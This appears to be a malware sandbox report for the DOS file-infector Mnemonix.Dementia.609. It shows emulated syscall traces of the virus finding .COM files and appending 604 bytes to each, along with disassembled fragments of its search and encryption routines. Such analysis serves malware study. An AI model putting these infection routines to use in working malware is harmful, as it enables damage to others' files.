Sample viewer

vx.netlux.org/Virus.DOS.Mnemonix.Dementia.609

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:50:52.040438594Z 42 PC: 12ac8 | Get date 0x12ac8: cmp al, 2
0x12aca: ja 0x12aea
0x12acc: mov ah, 0x47
0x12ace: mov dl, 0
0x12ad0: mov si, bp
0x12ad2: add si, 0x210
0x12ad6: int 0x21
0x12ad8: mov dx, bp
0x12ada: add dx, 0x206
0x12ade: mov ah, 0x3b
0x12ae0: int 0x21
0x12ae2: mov bx, bp
0x12ae4: add bx, 0x24f
0x12ae8: inc byte ptr [bx]
0x12aea: mov ah, 0x4e
0x12aec: xor cx, cx
0x12aee: mov dx, bp
0x12af0: add dx, 0x209
0x12af4: int 0x21
0x12af6: jb 0x12afe
2018-12-17T22:50:52.043084755Z 71 PC: 12ad8 | Get current directory
2018-12-17T22:50:52.046762675Z 59 PC: 12ae2 | Change current directory
2018-12-17T22:50:52.051132053Z 78 PC: 12af6 | Find first file
2018-12-17T22:50:52.057387264Z 61 PC: 12b98 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:50:52.065378407Z 63 PC: 12ba7 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:50:52.072586668Z 66 PC: 12bd1 | Move file pointer
2018-12-17T22:50:52.074532584Z 64 PC: 12bde | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:50:52.078327433Z 66 PC: 12be7 | Move file pointer
2018-12-17T22:50:52.080012929Z 64 PC: 12bf4 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:50:52.082991826Z 44 PC: 12c0a | Get time 0x12c0a: mov ah, dh
0x12c0c: add dx, word ptr [bx + 2]
0x12c0f: mov word ptr [bx + 2], dx
0x12c12: mov cx, word ptr [0x9a]
0x12c16: add cx, word ptr [bx]
0x12c18: mov word ptr [bx], cx
0x12c1a: mov bx, cx
0x12c1c: mov cx, 0x2e
0x12c1f: rep movsb byte ptr es:[di], byte ptr [si]
0x12c21: mov cx, 0x117
0x12c24: lodsw ax, word ptr [si]
0x12c25: sub ax, bx
0x12c27: sub bx, dx
0x12c29: stosw word ptr es:[di], ax
0x12c2a: loop 0x12c24
0x12c2c: pop bx
0x12c2d: mov dx, bp
0x12c2f: add dx, 0x3e6
0x12c33: mov cx, 0x25c
0x12c36: mov ah, 0x40
2018-12-17T22:50:52.086525905Z 64 PC: 12c3a | Write file or device (Write 604 bytes on handle 5)
2018-12-17T22:50:52.101318074Z 87 PC: 12c47 | Get or set file date and time
2018-12-17T22:50:52.102957153Z 62 PC: 12c4b | Close file
2018-12-17T22:50:52.110829533Z 79 PC: 12b05 | Find next file
2018-12-17T22:50:52.114980962Z 61 PC: 12b98 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:50:52.122115104Z 63 PC: 12ba7 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:50:52.128928845Z 66 PC: 12bd1 | Move file pointer
2018-12-17T22:50:52.131616954Z 64 PC: 12bde | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:50:52.134864906Z 66 PC: 12be7 | Move file pointer
2018-12-17T22:50:52.13655931Z 64 PC: 12bf4 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:50:52.140320716Z 44 PC: 12c0a | Get time 0x12c0a: mov ah, dh
0x12c0c: add dx, word ptr [bx + 2]
0x12c0f: mov word ptr [bx + 2], dx
0x12c12: mov cx, word ptr [0x9a]
0x12c16: add cx, word ptr [bx]
0x12c18: mov word ptr [bx], cx
0x12c1a: mov bx, cx
0x12c1c: mov cx, 0x2e
0x12c1f: rep movsb byte ptr es:[di], byte ptr [si]
0x12c21: mov cx, 0x117
0x12c24: lodsw ax, word ptr [si]
0x12c25: sub ax, bx
0x12c27: sub bx, dx
0x12c29: stosw word ptr es:[di], ax
0x12c2a: loop 0x12c24
0x12c2c: pop bx
0x12c2d: mov dx, bp
0x12c2f: add dx, 0x3e6
0x12c33: mov cx, 0x25c
0x12c36: mov ah, 0x40
2018-12-17T22:50:52.142735242Z 64 PC: 12c3a | Write file or device (Write 604 bytes on handle 5)
2018-12-17T22:50:52.151123049Z 87 PC: 12c47 | Get or set file date and time
2018-12-17T22:50:52.153895638Z 62 PC: 12c4b | Close file
2018-12-17T22:50:52.162383363Z 79 PC: 12b05 | Find next file
2018-12-17T22:50:52.165298731Z 61 PC: 12b98 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:50:52.172813728Z 63 PC: 12ba7 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:50:52.184606884Z 66 PC: 12bd1 | Move file pointer
2018-12-17T22:50:52.186604837Z 64 PC: 12bde | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:50:52.189893535Z 66 PC: 12be7 | Move file pointer
2018-12-17T22:50:52.192920772Z 64 PC: 12bf4 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:50:52.19644351Z 44 PC: 12c0a | Get time 0x12c0a: mov ah, dh
0x12c0c: add dx, word ptr [bx + 2]
0x12c0f: mov word ptr [bx + 2], dx
0x12c12: mov cx, word ptr [0x9a]
0x12c16: add cx, word ptr [bx]
0x12c18: mov word ptr [bx], cx
0x12c1a: mov bx, cx
0x12c1c: mov cx, 0x2e
0x12c1f: rep movsb byte ptr es:[di], byte ptr [si]
0x12c21: mov cx, 0x117
0x12c24: lodsw ax, word ptr [si]
0x12c25: sub ax, bx
0x12c27: sub bx, dx
0x12c29: stosw word ptr es:[di], ax
0x12c2a: loop 0x12c24
0x12c2c: pop bx
0x12c2d: mov dx, bp
0x12c2f: add dx, 0x3e6
0x12c33: mov cx, 0x25c
0x12c36: mov ah, 0x40
2018-12-17T22:50:52.199594209Z 64 PC: 12c3a | Write file or device (Write 604 bytes on handle 5)
2018-12-17T22:50:52.209504176Z 87 PC: 12c47 | Get or set file date and time
2018-12-17T22:50:52.211370412Z 62 PC: 12c4b | Close file
2018-12-17T22:50:52.220270903Z 79 PC: 12b05 | Find next file
2018-12-17T22:50:52.224879602Z 61 PC: 12b98 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:50:52.231807546Z 63 PC: 12ba7 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:50:52.238485281Z 66 PC: 12bd1 | Move file pointer
2018-12-17T22:50:52.240620593Z 64 PC: 12bde | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:50:52.243657107Z 66 PC: 12be7 | Move file pointer
2018-12-17T22:50:52.246230282Z 64 PC: 12bf4 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:50:52.249954458Z 44 PC: 12c0a | Get time 0x12c0a: mov ah, dh
0x12c0c: add dx, word ptr [bx + 2]
0x12c0f: mov word ptr [bx + 2], dx
0x12c12: mov cx, word ptr [0x9a]
0x12c16: add cx, word ptr [bx]
0x12c18: mov word ptr [bx], cx
0x12c1a: mov bx, cx
0x12c1c: mov cx, 0x2e
0x12c1f: rep movsb byte ptr es:[di], byte ptr [si]
0x12c21: mov cx, 0x117
0x12c24: lodsw ax, word ptr [si]
0x12c25: sub ax, bx
0x12c27: sub bx, dx
0x12c29: stosw word ptr es:[di], ax
0x12c2a: loop 0x12c24
0x12c2c: pop bx
0x12c2d: mov dx, bp
0x12c2f: add dx, 0x3e6
0x12c33: mov cx, 0x25c
0x12c36: mov ah, 0x40
2018-12-17T22:50:52.25358632Z 64 PC: 12c3a | Write file or device (Write 604 bytes on handle 5)
2018-12-17T22:50:52.268737384Z 87 PC: 12c47 | Get or set file date and time
2018-12-17T22:50:52.271508009Z 62 PC: 12c4b | Close file
2018-12-17T22:50:52.281733098Z 79 PC: 12b05 | Find next file
2018-12-17T22:50:52.28510362Z 61 PC: 12b98 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:50:52.292701574Z 63 PC: 12ba7 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:50:52.300515674Z 66 PC: 12bd1 | Move file pointer
2018-12-17T22:50:52.302386047Z 64 PC: 12bde | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:50:52.305436979Z 66 PC: 12be7 | Move file pointer
2018-12-17T22:50:52.307784529Z 64 PC: 12bf4 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:50:52.311183765Z 44 PC: 12c0a | Get time 0x12c0a: mov ah, dh
0x12c0c: add dx, word ptr [bx + 2]
0x12c0f: mov word ptr [bx + 2], dx
0x12c12: mov cx, word ptr [0x9a]
0x12c16: add cx, word ptr [bx]
0x12c18: mov word ptr [bx], cx
0x12c1a: mov bx, cx
0x12c1c: mov cx, 0x2e
0x12c1f: rep movsb byte ptr es:[di], byte ptr [si]
0x12c21: mov cx, 0x117
0x12c24: lodsw ax, word ptr [si]
0x12c25: sub ax, bx
0x12c27: sub bx, dx
0x12c29: stosw word ptr es:[di], ax
0x12c2a: loop 0x12c24
0x12c2c: pop bx
0x12c2d: mov dx, bp
0x12c2f: add dx, 0x3e6
0x12c33: mov cx, 0x25c
0x12c36: mov ah, 0x40
2018-12-17T22:50:52.313791454Z 64 PC: 12c3a | Write file or device (Write 604 bytes on handle 5)
2018-12-17T22:50:52.323277094Z 87 PC: 12c47 | Get or set file date and time
2018-12-17T22:50:52.326103474Z 62 PC: 12c4b | Close file
2018-12-17T22:50:52.334721093Z 79 PC: 12b05 | Find next file
2018-12-17T22:50:52.33804612Z 61 PC: 12b98 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:50:52.346356281Z 63 PC: 12ba7 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:50:52.353317469Z 66 PC: 12bd1 | Move file pointer
2018-12-17T22:50:52.355142928Z 64 PC: 12bde | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:50:52.359175224Z 66 PC: 12be7 | Move file pointer
2018-12-17T22:50:52.36190957Z 64 PC: 12bf4 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:50:52.365090195Z 44 PC: 12c0a | Get time 0x12c0a: mov ah, dh
0x12c0c: add dx, word ptr [bx + 2]
0x12c0f: mov word ptr [bx + 2], dx
0x12c12: mov cx, word ptr [0x9a]
0x12c16: add cx, word ptr [bx]
0x12c18: mov word ptr [bx], cx
0x12c1a: mov bx, cx
0x12c1c: mov cx, 0x2e
0x12c1f: rep movsb byte ptr es:[di], byte ptr [si]
0x12c21: mov cx, 0x117
0x12c24: lodsw ax, word ptr [si]
0x12c25: sub ax, bx
0x12c27: sub bx, dx
0x12c29: stosw word ptr es:[di], ax
0x12c2a: loop 0x12c24
0x12c2c: pop bx
0x12c2d: mov dx, bp
0x12c2f: add dx, 0x3e6
0x12c33: mov cx, 0x25c
0x12c36: mov ah, 0x40
2018-12-17T22:50:52.368810555Z 64 PC: 12c3a | Write file or device (Write 604 bytes on handle 5)
2018-12-17T22:50:52.378312917Z 87 PC: 12c47 | Get or set file date and time
2018-12-17T22:50:52.380248372Z 62 PC: 12c4b | Close file
2018-12-17T22:50:52.390053252Z 79 PC: 12b05 | Find next file
2018-12-17T22:50:52.394286124Z 61 PC: 12b98 | Open file (Filename = 'PAH.COM')
2018-12-17T22:50:52.402309547Z 63 PC: 12ba7 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:50:52.409173132Z 66 PC: 12bd1 | Move file pointer
2018-12-17T22:50:52.411085474Z 64 PC: 12bde | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:50:52.413878331Z 66 PC: 12be7 | Move file pointer
2018-12-17T22:50:52.415771918Z 64 PC: 12bf4 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:50:52.419441522Z 44 PC: 12c0a | Get time 0x12c0a: mov ah, dh
0x12c0c: add dx, word ptr [bx + 2]
0x12c0f: mov word ptr [bx + 2], dx
0x12c12: mov cx, word ptr [0x9a]
0x12c16: add cx, word ptr [bx]
0x12c18: mov word ptr [bx], cx
0x12c1a: mov bx, cx
0x12c1c: mov cx, 0x2e
0x12c1f: rep movsb byte ptr es:[di], byte ptr [si]
0x12c21: mov cx, 0x117
0x12c24: lodsw ax, word ptr [si]
0x12c25: sub ax, bx
0x12c27: sub bx, dx
0x12c29: stosw word ptr es:[di], ax
0x12c2a: loop 0x12c24
0x12c2c: pop bx
0x12c2d: mov dx, bp
0x12c2f: add dx, 0x3e6
0x12c33: mov cx, 0x25c
0x12c36: mov ah, 0x40
2018-12-17T22:50:52.421868251Z 64 PC: 12c3a | Write file or device (Write 604 bytes on handle 5)
2018-12-17T22:50:52.430436478Z 87 PC: 12c47 | Get or set file date and time
2018-12-17T22:50:52.433249252Z 62 PC: 12c4b | Close file
2018-12-17T22:50:52.441518316Z 79 PC: 12b05 | Find next file
2018-12-17T22:50:52.444447268Z 61 PC: 12b98 | Open file (Filename = 'TEST.COM')
2018-12-17T22:50:52.452410308Z 63 PC: 12ba7 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:50:52.456368775Z 87 PC: 12c47 | Get or set file date and time
2018-12-17T22:50:52.45845784Z 62 PC: 12c4b | Close file
2018-12-17T22:50:52.466958218Z 79 PC: 12b05 | Find next file
2018-12-17T22:50:52.469843128Z 59 PC: 12c61 | Change current directory
2018-12-17T22:50:52.474595777Z 76 PC: 12a45 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10363,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:49.164913883Z 42 PC: 12ac8 | Get date 0x12ac8: cmp al, 2
0x12aca: ja 0x12aea
0x12acc: mov ah, 0x47
0x12ace: mov dl, 0
0x12ad0: mov si, bp
0x12ad2: add si, 0x210
0x12ad6: int 0x21
0x12ad8: mov dx, bp
0x12ada: add dx, 0x206
0x12ade: mov ah, 0x3b
0x12ae0: int 0x21
0x12ae2: mov bx, bp
0x12ae4: add bx, 0x24f
0x12ae8: inc byte ptr [bx]
0x12aea: mov ah, 0x4e
0x12aec: xor cx, cx
0x12aee: mov dx, bp
0x12af0: add dx, 0x209
0x12af4: int 0x21
0x12af6: jb 0x12afe
2018-12-25T12:27:49.16728472Z 71 PC: 12ad8 | Get current directory
2018-12-25T12:27:49.171038516Z 59 PC: 12ae2 | Change current directory
2018-12-25T12:27:49.189378016Z 78 PC: 12af6 | Find first file
2018-12-25T12:27:49.196667275Z 61 PC: 12b98 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:49.213213034Z 63 PC: 12ba7 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T12:27:49.228408575Z 66 PC: 12bd1 | Move file pointer
2018-12-25T12:27:49.230047116Z 64 PC: 12bde | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:27:49.237722674Z 66 PC: 12be7 | Move file pointer
2018-12-25T12:27:49.239640611Z 64 PC: 12bf4 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:27:49.243131217Z 44 PC: 12c0a | Get time 0x12c0a: mov ah, dh
0x12c0c: add dx, word ptr [bx + 2]
0x12c0f: mov word ptr [bx + 2], dx
0x12c12: mov cx, word ptr [0x9a]
0x12c16: add cx, word ptr [bx]
0x12c18: mov word ptr [bx], cx
0x12c1a: mov bx, cx
0x12c1c: mov cx, 0x2e
0x12c1f: rep movsb byte ptr es:[di], byte ptr [si]
0x12c21: mov cx, 0x117
0x12c24: lodsw ax, word ptr [si]
0x12c25: sub ax, bx
0x12c27: sub bx, dx
0x12c29: stosw word ptr es:[di], ax
0x12c2a: loop 0x12c24
0x12c2c: pop bx
0x12c2d: mov dx, bp
0x12c2f: add dx, 0x3e6
0x12c33: mov cx, 0x25c
0x12c36: mov ah, 0x40
2018-12-25T12:27:49.247611536Z 64 PC: 12c3a | Write file or device (Write 604 bytes on handle 5)
2018-12-25T12:27:49.262610798Z 87 PC: 12c47 | Get or set file date and time
2018-12-25T12:27:49.264645191Z 62 PC: 12c4b | Close file
2018-12-25T12:27:49.273514044Z 79 PC: 12b05 | Find next file
2018-12-25T12:27:49.277604986Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:49.285065557Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:49.292447143Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:49.295141955Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:49.298116476Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:49.299734484Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:49.309162015Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:49.31224988Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:49.321835822Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:49.324428269Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:49.333748688Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:49.336742623Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:49.348993015Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:49.356404263Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:49.358092594Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:49.377286477Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:49.384358698Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:49.387727022Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:49.390679018Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:49.400936586Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:49.403180212Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:49.412280617Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:49.416498592Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:49.423879652Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:49.431144189Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:49.433451818Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:49.436808533Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:49.438891186Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:49.443066855Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:49.446076117Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:49.455260435Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:49.45803235Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:49.467967257Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:49.471333541Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:49.47964915Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:49.487094798Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:49.489092108Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:49.492687375Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:49.494985066Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:49.498397123Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:49.501463616Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:49.510655355Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:49.512567042Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:49.52166777Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:49.525068964Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:49.532536332Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:49.540297217Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:49.542756249Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:49.54613656Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:49.548133974Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:49.552149883Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:49.555064327Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:49.565047968Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:49.567868442Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:49.576575113Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:49.579771748Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:49.587892131Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:49.595104797Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:49.596914856Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:49.60066007Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:49.603484795Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:49.606797808Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:49.609962344Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:49.619097673Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:49.621156768Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:49.629686841Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:49.633750131Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:49.64121042Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:49.644429842Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:49.647853032Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:49.655730681Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:49.658800694Z 59 PC: 12c61 | Change current directory
2018-12-25T12:27:49.664629196Z 76 PC: 12a45 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10363,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:49.860362602Z 42 PC: 12ac8 | Get date 0x12ac8: cmp al, 2
0x12aca: ja 0x12aea
0x12acc: mov ah, 0x47
0x12ace: mov dl, 0
0x12ad0: mov si, bp
0x12ad2: add si, 0x210
0x12ad6: int 0x21
0x12ad8: mov dx, bp
0x12ada: add dx, 0x206
0x12ade: mov ah, 0x3b
0x12ae0: int 0x21
0x12ae2: mov bx, bp
0x12ae4: add bx, 0x24f
0x12ae8: inc byte ptr [bx]
0x12aea: mov ah, 0x4e
0x12aec: xor cx, cx
0x12aee: mov dx, bp
0x12af0: add dx, 0x209
0x12af4: int 0x21
0x12af6: jb 0x12afe
2018-12-25T12:27:49.866851864Z 78 PC: 12af6 | Find first file
2018-12-25T12:27:49.872926497Z 61 PC: 12b98 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:49.879331427Z 63 PC: 12ba7 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T12:27:49.885792452Z 66 PC: 12bd1 | Move file pointer
2018-12-25T12:27:49.889554403Z 64 PC: 12bde | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:27:49.892013565Z 66 PC: 12be7 | Move file pointer
2018-12-25T12:27:49.893640286Z 64 PC: 12bf4 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:27:49.897029536Z 44 PC: 12c0a | Get time 0x12c0a: mov ah, dh
0x12c0c: add dx, word ptr [bx + 2]
0x12c0f: mov word ptr [bx + 2], dx
0x12c12: mov cx, word ptr [0x9a]
0x12c16: add cx, word ptr [bx]
0x12c18: mov word ptr [bx], cx
0x12c1a: mov bx, cx
0x12c1c: mov cx, 0x2e
0x12c1f: rep movsb byte ptr es:[di], byte ptr [si]
0x12c21: mov cx, 0x117
0x12c24: lodsw ax, word ptr [si]
0x12c25: sub ax, bx
0x12c27: sub bx, dx
0x12c29: stosw word ptr es:[di], ax
0x12c2a: loop 0x12c24
0x12c2c: pop bx
0x12c2d: mov dx, bp
0x12c2f: add dx, 0x3e6
0x12c33: mov cx, 0x25c
0x12c36: mov ah, 0x40
2018-12-25T12:27:49.899192187Z 64 PC: 12c3a | Write file or device (Write 604 bytes on handle 5)
2018-12-25T12:27:49.913458503Z 87 PC: 12c47 | Get or set file date and time
2018-12-25T12:27:49.91588746Z 62 PC: 12c4b | Close file
2018-12-25T12:27:49.923237906Z 79 PC: 12b05 | Find next file
2018-12-25T12:27:49.92599452Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:49.9333233Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:49.93978424Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:49.941051975Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:49.944396137Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:49.945766365Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:49.948385263Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:49.951797742Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:49.959689806Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:49.961814564Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:49.970427794Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:49.973096929Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:49.984992838Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:49.994181529Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:49.996696877Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:49.999141715Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:50.000885454Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:50.00402842Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:50.006496454Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:50.015197692Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:50.017009778Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:50.024694586Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:50.027812192Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:50.035436536Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:50.041946442Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:50.043668123Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:50.047553459Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:50.049262897Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:50.052917054Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:50.056751209Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:50.0648876Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:50.066552222Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:50.075075364Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:50.078103732Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:50.08451554Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:50.090890573Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:50.093052468Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:50.095652386Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:50.096934608Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:50.100024483Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:50.10247395Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:50.110157953Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:50.112683266Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:50.120292976Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:50.123627481Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:50.130558693Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:50.136780433Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:50.138278524Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:50.1417129Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:50.143570081Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:50.146314488Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:50.149380319Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:50.158464031Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:50.160087386Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:50.168149001Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:50.171115736Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:50.177483691Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:50.183900418Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:50.186151586Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:50.189585799Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:50.191109023Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:50.194739483Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:50.197149932Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:50.204951473Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:50.207209281Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:50.214288928Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:50.216702096Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:50.223618233Z 63 PC: 12ba7 | Read file or device (See above)
